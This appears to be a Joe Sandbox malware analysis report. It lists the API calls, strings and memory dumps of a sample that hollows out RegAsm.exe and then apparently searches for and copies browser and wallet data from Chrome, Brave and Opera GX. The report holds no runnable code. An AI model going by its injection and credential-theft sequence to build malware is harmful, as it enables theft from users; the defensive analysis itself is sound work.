WriteProcessMemory.KERNELBASE(00000094,00000000,?,?,00000000,?), ref: 02722374
WriteProcessMemory.KERNELBASE(00000094,00400000,?,?,00000000,?,00000028), ref: 027223BF
WriteProcessMemory.KERNELBASE(00000094,?,?,00000004,00000000), ref: 027223FD
Wow64SetThreadContext.KERNEL32(00000034,025D0000), ref: 02722439
ResumeThread.KERNELBASE(00000034), ref: 02722448

Strings

WriteProcessMemory, xrefs: 02722240
ReadProcessMemory, xrefs: 0272221A
TerminateProcess, xrefs: 0272232B
VirtualAlloc, xrefs: 027221F4
aryA, xrefs: 02722173
VirtualAllocEx, xrefs: 0272222D
ress, xrefs: 027221B7
GetP, xrefs: 027221AF
ResumeThread, xrefs: 02722269
GetThreadContext, xrefs: 02722207
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0272229B
Load, xrefs: 0272216B
CreateProcessA, xrefs: 027221E1
SetThreadContext, xrefs: 02722253

Memory Dump Source

Source File: 00000000.00000002.1679174337.0000000002721000.00000040.00000800.00020000.00000000.sdmp, Offset: 02721000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2721000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: daeda220dbff94c7da847cea8f7733da7702047abbb753d5531db23b37747695
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 1EB1E67664024AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB342D774FA41CB94

Function 024D0C40 Relevance: .3, Instructions: 320
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1679039259.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24d0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40f87f2c61626bf4b2380375e8ac7588a33fd71310cb4aa8321e87a553863654
Instruction ID: cdb3e4b5c9a64c3ea4d2480a07d8b094167751123e5ba30e3405d4cefc3ff8b3
Opcode Fuzzy Hash: 40f87f2c61626bf4b2380375e8ac7588a33fd71310cb4aa8321e87a553863654
Instruction Fuzzy Hash: 4DD1AC70E042588FCB01CFA9C9907EDFBF2AF48314F24956AE859EB246C775AC41CB94

Function 024D12E1 Relevance: 1.6, APIs: 1, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 024D12A0

Memory Dump Source

Source File: 00000000.00000002.1679039259.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24d0000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18d9c50be4b5ec8c5bf4398040f33d07238f94700bde34e5ab498ca5dcf8ca99
Instruction ID: 7d2f2173cbf9087d0f4c3e5377f134be0696131cbb1559cd1fa847959990cad8
Opcode Fuzzy Hash: 18d9c50be4b5ec8c5bf4398040f33d07238f94700bde34e5ab498ca5dcf8ca99
Instruction Fuzzy Hash: 9C3132B6D012588FCF10CFA9D894BDEBFF0AF49314F14816AE848AB261C3759844CFA1

Function 024D1218 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 024D12A0

Memory Dump Source

Source File: 00000000.00000002.1679039259.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24d0000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: bf01dde74944590770637e5b22afe90dcb6a1fbd981954b7b91a9e037ff9a907
Instruction ID: 9164c3fff486eb0371e432876e9060d68a43c5eb2bd9561e1cb85170d13720b3
Opcode Fuzzy Hash: bf01dde74944590770637e5b22afe90dcb6a1fbd981954b7b91a9e037ff9a907
Instruction Fuzzy Hash: 2121F3B19002599FCB10DFAAC981AEEBBF0FF48310F10852AE959A7250C7755944CFA1

Function 024D1220 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 024D12A0

Memory Dump Source

Source File: 00000000.00000002.1679039259.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24d0000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 921e50f18e7aebf20e0dcea76a8ab5480b729081ed0f8ea675cdc3ff64db3be3
Instruction ID: b35266ded0c3c9fa6f4bf6ea28c062c54168ce8df97f9e660070a6ded6b11ae8
Opcode Fuzzy Hash: 921e50f18e7aebf20e0dcea76a8ab5480b729081ed0f8ea675cdc3ff64db3be3
Instruction Fuzzy Hash: 752110B1D002599FCB10DFAAC980ADEFBF4FF48310F10842AE959A7250C775A944CFA5

Analysis Process: RegAsm.exePID: 7476, Parent PID: 7408COMMON

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	31

Executed Functions

Function 00418950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,004172CA), ref: 00418964
GetProcAddress.KERNEL32 ref: 0041897B
GetProcAddress.KERNEL32 ref: 00418992
GetProcAddress.KERNEL32 ref: 004189A9
GetProcAddress.KERNEL32 ref: 004189C0
GetProcAddress.KERNEL32 ref: 004189D7
GetProcAddress.KERNEL32 ref: 004189EE
GetProcAddress.KERNEL32 ref: 00418A05
GetProcAddress.KERNEL32 ref: 00418A1C
GetProcAddress.KERNEL32 ref: 00418A33
GetProcAddress.KERNEL32 ref: 00418A4A
GetProcAddress.KERNEL32 ref: 00418A61
GetProcAddress.KERNEL32 ref: 00418A78
GetProcAddress.KERNEL32 ref: 00418A8F
GetProcAddress.KERNEL32 ref: 00418AA6
GetProcAddress.KERNEL32 ref: 00418ABD
GetProcAddress.KERNEL32 ref: 00418AD4
GetProcAddress.KERNEL32 ref: 00418AEB
GetProcAddress.KERNEL32 ref: 00418B02
GetProcAddress.KERNEL32 ref: 00418B19
GetProcAddress.KERNEL32 ref: 00418B30
GetProcAddress.KERNEL32 ref: 00418B47
GetProcAddress.KERNEL32 ref: 00418B5E
GetProcAddress.KERNEL32 ref: 00418B75
GetProcAddress.KERNEL32 ref: 00418B8C
GetProcAddress.KERNEL32 ref: 00418BA3
GetProcAddress.KERNEL32 ref: 00418BBA
GetProcAddress.KERNEL32 ref: 00418BD1
GetProcAddress.KERNEL32 ref: 00418BE8
GetProcAddress.KERNEL32 ref: 00418BFF
GetProcAddress.KERNEL32 ref: 00418C16
GetProcAddress.KERNEL32 ref: 00418C2D
GetProcAddress.KERNEL32 ref: 00418C44
GetProcAddress.KERNEL32 ref: 00418C5B
GetProcAddress.KERNEL32 ref: 00418C72
GetProcAddress.KERNEL32 ref: 00418C89
GetProcAddress.KERNEL32 ref: 00418CA0
GetProcAddress.KERNEL32 ref: 00418CB7
GetProcAddress.KERNEL32 ref: 00418CCE
GetProcAddress.KERNEL32 ref: 00418CE5
GetProcAddress.KERNEL32 ref: 00418CFC
GetProcAddress.KERNEL32 ref: 00418D13
GetProcAddress.KERNEL32 ref: 00418D2A
GetProcAddress.KERNEL32(CreateProcessA), ref: 00418D40
GetProcAddress.KERNEL32(GetThreadContext), ref: 00418D56
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00418D6C
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00418D82
GetProcAddress.KERNEL32(ResumeThread), ref: 00418D98
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00418DAE
GetProcAddress.KERNEL32(SetThreadContext), ref: 00418DC4
LoadLibraryA.KERNEL32(004172CA), ref: 00418DD5
LoadLibraryA.KERNEL32 ref: 00418DE6
LoadLibraryA.KERNEL32 ref: 00418DF7
LoadLibraryA.KERNEL32 ref: 00418E08
LoadLibraryA.KERNEL32 ref: 00418E19
LoadLibraryA.KERNEL32 ref: 00418E2A
LoadLibraryA.KERNEL32 ref: 00418E3B
LoadLibraryA.KERNEL32 ref: 00418E4C
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418E5C
GetProcAddress.KERNEL32(75290000), ref: 00418E77
GetProcAddress.KERNEL32 ref: 00418E8E
GetProcAddress.KERNEL32 ref: 00418EA5
GetProcAddress.KERNEL32 ref: 00418EBC
GetProcAddress.KERNEL32 ref: 00418ED3
GetProcAddress.KERNEL32(6FC70000), ref: 00418EF2
GetProcAddress.KERNEL32 ref: 00418F09
GetProcAddress.KERNEL32 ref: 00418F20
GetProcAddress.KERNEL32 ref: 00418F37
GetProcAddress.KERNEL32 ref: 00418F4E
GetProcAddress.KERNEL32 ref: 00418F65
GetProcAddress.KERNEL32 ref: 00418F7C
GetProcAddress.KERNEL32 ref: 00418F93
GetProcAddress.KERNEL32(752C0000), ref: 00418FAE
GetProcAddress.KERNEL32 ref: 00418FC5
GetProcAddress.KERNEL32 ref: 00418FDC
GetProcAddress.KERNEL32 ref: 00418FF3
GetProcAddress.KERNEL32 ref: 0041900A
GetProcAddress.KERNEL32(74EC0000), ref: 00419029
GetProcAddress.KERNEL32 ref: 00419040
GetProcAddress.KERNEL32 ref: 00419057
GetProcAddress.KERNEL32 ref: 0041906E
GetProcAddress.KERNEL32 ref: 00419085
GetProcAddress.KERNEL32 ref: 0041909C
GetProcAddress.KERNEL32(75BD0000), ref: 004190BB
GetProcAddress.KERNEL32 ref: 004190D2
GetProcAddress.KERNEL32 ref: 004190E9
GetProcAddress.KERNEL32 ref: 00419100
GetProcAddress.KERNEL32 ref: 00419117
GetProcAddress.KERNEL32 ref: 0041912E
GetProcAddress.KERNEL32 ref: 00419145
GetProcAddress.KERNEL32 ref: 0041915C
GetProcAddress.KERNEL32 ref: 00419173
GetProcAddress.KERNEL32(75A70000), ref: 0041918E
GetProcAddress.KERNEL32 ref: 004191A5
GetProcAddress.KERNEL32 ref: 004191BC
GetProcAddress.KERNEL32 ref: 004191D3
GetProcAddress.KERNEL32 ref: 004191EA
GetProcAddress.KERNEL32(75450000), ref: 00419205
GetProcAddress.KERNEL32 ref: 0041921C
GetProcAddress.KERNEL32(75DA0000), ref: 00419237
GetProcAddress.KERNEL32 ref: 0041924E
GetProcAddress.KERNEL32(6F070000), ref: 0041926D
GetProcAddress.KERNEL32 ref: 00419284
GetProcAddress.KERNEL32 ref: 0041929B
GetProcAddress.KERNEL32 ref: 004192B2
GetProcAddress.KERNEL32 ref: 004192C9
GetProcAddress.KERNEL32 ref: 004192E0
GetProcAddress.KERNEL32 ref: 004192F7
GetProcAddress.KERNEL32 ref: 0041930E
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419324
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041933A
GetProcAddress.KERNEL32(75AF0000), ref: 00419355
GetProcAddress.KERNEL32 ref: 0041936C
GetProcAddress.KERNEL32 ref: 00419383
GetProcAddress.KERNEL32 ref: 0041939A
GetProcAddress.KERNEL32(75D90000), ref: 004193B5
GetProcAddress.KERNEL32(6C540000), ref: 004193D0
GetProcAddress.KERNEL32 ref: 004193E7
GetProcAddress.KERNEL32 ref: 004193FE
GetProcAddress.KERNEL32 ref: 00419415
GetProcAddress.KERNEL32(6C350000,SymMatchString), ref: 0041942F

Strings

VirtualAllocEx, xrefs: 00418D72
SymMatchString, xrefs: 00419429
CreateProcessA, xrefs: 00418D30
WriteProcessMemory, xrefs: 00418D9E
GetThreadContext, xrefs: 00418D46
dbghelp.dll, xrefs: 00418E52
ResumeThread, xrefs: 00418D88
SetThreadContext, xrefs: 00418DB4
ReadProcessMemory, xrefs: 00418D5C
HttpQueryInfoA, xrefs: 00419314
InternetSetOptionA, xrefs: 0041932A

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

Function 00414CC8 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 297
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414D1C
FindFirstFileA.KERNEL32(?,?), ref: 00414D33
_memset.LIBCMT ref: 00414D4F
_memset.LIBCMT ref: 00414D60
StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
wsprintfA.USER32 ref: 00414DC2
StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
wsprintfA.USER32 ref: 00414DFF
wsprintfA.USER32 ref: 00414E16

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181

_memset.LIBCMT ref: 00414E28
lstrcatA.KERNEL32(?,?), ref: 00414E3D
strtok_s.MSVCRT ref: 00414E82
_memset.LIBCMT ref: 00414E94
lstrcatA.KERNEL32(?,?), ref: 00414EA9
strtok_s.MSVCRT ref: 00414EC2
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
strtok_s.MSVCRT ref: 00414FE7
FindNextFileA.KERNELBASE(?,?), ref: 00415105
FindClose.KERNEL32(?), ref: 00415125

Strings

%s\*.*, xrefs: 00414D10
%s\%s\%s, xrefs: 00414DF9
%s\%s, xrefs: 00414DBC
%s\%s, xrefs: 00414E10

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcatwsprintf$FileFindlstrcpystrtok_s$CloseCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 2867719434-332874205
Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55

Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E

CopyFileA.KERNEL32(?,?,00000001,004371C4,004367CF,?,?,?), ref: 00408941

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
lstrlenA.KERNEL32(?), ref: 00408CF0
lstrlenA.KERNEL32(?), ref: 00408D0B

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

DeleteFileA.KERNEL32(?), ref: 00408D4E

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00408B8F

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 2819533921-2709115261
Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98

Function 00409D1C Relevance: 40.9, APIs: 18, Strings: 5, Instructions: 610
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
StrCmpCA.SHLWAPI(?), ref: 0040A1FC
StrCmpCA.SHLWAPI(?), ref: 0040A266
StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

StrCmpCA.SHLWAPI(?), ref: 0040A35C
CopyFileA.KERNEL32(?,?,00000001,0043738C,004367FB), ref: 0040A41C
StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
DeleteFileA.KERNEL32(?), ref: 0040A522

Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF

Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B

StrCmpCA.SHLWAPI(?), ref: 0040A553
CopyFileA.KERNEL32(?,?,00000001,004373A0,00436802), ref: 0040A613
DeleteFileA.KERNEL32(?), ref: 0040A6AA

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

FindNextFileA.KERNEL32(?,?), ref: 0040A76E
FindClose.KERNEL32(?), ref: 0040A782

Strings

Brave, xrefs: 0040A00D
Preferences, xrefs: 0040A023
\BraveWallet\Preferences, xrefs: 0040A105
Opera GX, xrefs: 00409E8B
Google Chrome, xrefs: 0040A4B9

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpylstrlen$Find$CopyDeletelstrcat$CloseFirstNextSystemTime
String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 3650549319-1189830961
Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89

Function 6C0135A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C09F688,00001000), ref: 6C0135D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0135E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C0135FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C01363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C01369F
__aulldiv.LIBCMT ref: 6C0136E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C013773
EnterCriticalSection.KERNEL32(6C09F688), ref: 6C01377E
LeaveCriticalSection.KERNEL32(6C09F688), ref: 6C0137BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C0137C4
EnterCriticalSection.KERNEL32(6C09F688), ref: 6C0137CB
LeaveCriticalSection.KERNEL32(6C09F688), ref: 6C013801
